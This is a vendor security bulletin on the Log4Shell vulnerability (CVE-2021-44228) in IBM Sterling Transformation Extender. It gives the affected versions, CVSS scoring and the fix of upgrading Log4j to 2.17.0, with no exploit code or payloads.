Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Transformation Extender (CVE-2021-44228)
Discription

## Summary

IBM Sterling Transformation Extender is impacted by Log4j2 security vulnerability, CVE-2021-44228, where an attacker can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

## Vulnerability Details

** CVEID: **[CVE-2021-44228]()
** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.
CVSS Base score: 10
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921]() for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

## Affected Products and Versions

Affected Product(s)| Version(s)
—|—
IBM Sterling Transformation Extender | 10.0.3.0
IBM Sterling Transformation Extender| 10.1.0.0, 10.1.0.1
IBM Sterling Transformation Extender| 10.1.1.0

**NOT Applicable Releases:**

This security vulnerability is NOT applicable for the following releases of the product and all associated Industry and Enterprise Packs:

* WebSphere Transformation Extender 8.4.1.x (where x = { 0 | 1 | 2 | 3 | 4 | 5 })
* IBM Transformation Extender 9.0.0.x (where x = { 0 | 1 | 2 | 3 | 4 | 5 })
* IBM Transformation Extender 10.0.0.0

Also, not applicable to the following certified container releases:

* IBM Sterling Transformation Extender Certified Containers 10.0.0
* IBM Sterling Transformation Extender Certified Containers 10.0.1.x (where x = { 0 | 1 | 2 })
* IBM Sterling Transformation Extender Runtime Server 10.0.3

**NOTE:** Applicable to environments where Design Server and Runtime REST API server are used to design and run maps and flows in the environment. All other design and runtime environments are not affected. In other words, Design Studio, Command Server, Launcher, RMI Server and API environments are not affected by this security vulnerability.

## Remediation/Fixes

Affected Product(s)| Version(s)| Link to Fix
—|—|—
IBM Sterling Transformation Extender| 10.0.3.0| [Link]( “Link” )
IBM Sterling Transformation Extender| 10.1.0.0, 10.1.0.1| [Link]( “Link” )
IBM Sterling Transformation Extender| 10.1.1.0| [Link]( “Link” )

**Applicable Platforms:**

* Microsoft Windows
* IBM AIX
* Linux (Intel)
* Linux on System z (zLinux)

## Workarounds and Mitigations

Strongly recommend IBM Transformation Extender administrators apply remediation. Procedure to remediate the vulnerability based on the platforms and applicable versions differ, follow the remediation process provided here as appropriate to your environment.

IBM Sterling Transformation Extender is impacted by Log4j 2.x version security vulnerability, CVE-2021-44228. The other two security vulnerabilities, CVE-2021-45046 and CVE-2021-45105, are not applicable but as a measure of caution, upgraded Log4j to 2.17.0 version.

For detailed information on the security vulnerabilities, CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105, refer the following links:

IBM Sterling Transformation Extender is NOT impacted by Log4j 1.x version security vulnerabilities, CVE-2021-4104 and CVE-2019-17571. As a measure of caution, the vulnerable classes have been removed.

For detailed information on the security vulnerabilities, CVE-2021-4104 and CVE-2019-17571, refer the following links:

**Remediation:**

Log4j version has been upgraded to 2.17.0 for covering Log4j 2.x security vulnerabilities and vulnerable classes, JMSAppender and SocketServer, in the distributed Log4j 1.x version have been removed as a measure of caution for covering Log4j 1.x security vulnerabilities
in the IBM Sterling Transformation Extender product.

Steps to remediate the vulnerabilities:

1. Download the Interim Fix for the version(s) used in your environment from IBM Fix Central
2. Extract the Interim Fix zip file in your environment, which includes Readme.txt file with instructions to follow
3. Follow the instructions listed in the Readme.txt file

## Get Notified about Future Security Bulletins

Subscribe to [My Notifications]() to be notified of important product support alerts like this.

### References

[Complete CVSS v3 Guide]( “Link resides outside of ibm.com” )
[On-line Calculator v3]( “Link resides outside of ibm.com” )

Off

## Related Information

[IBM Secure Engineering Web Portal]()
[IBM Product Security Incident Response Blog]()

## Acknowledgement

## Change History

14 Dec 2021: Initial Publication

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

## Disclaimer

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an “industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.” IBM PROVIDES THE CVSS SCORES “”AS IS”” WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. “Affected Products and Versions” referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

## Document Location

Worldwide

[{“Business Unit”:{“code”:”BU059″,”label”:”IBM Software w/o TPS”},”Product”:{“code”:”SSVSD8″,”label”:”Transformation Extender”},”Component”:””,”Platform”:[{“code”:”PF033″,”label”:”Windows”},{“code”:”PF016″,”label”:”Linux”}],”Version”:”10.1″,”Edition”:””,”Line of Business”:{“code”:”LOB59″,”label”:”Sustainability Software”}}]Read More

References

Back to Main
Subscribe for the latest news: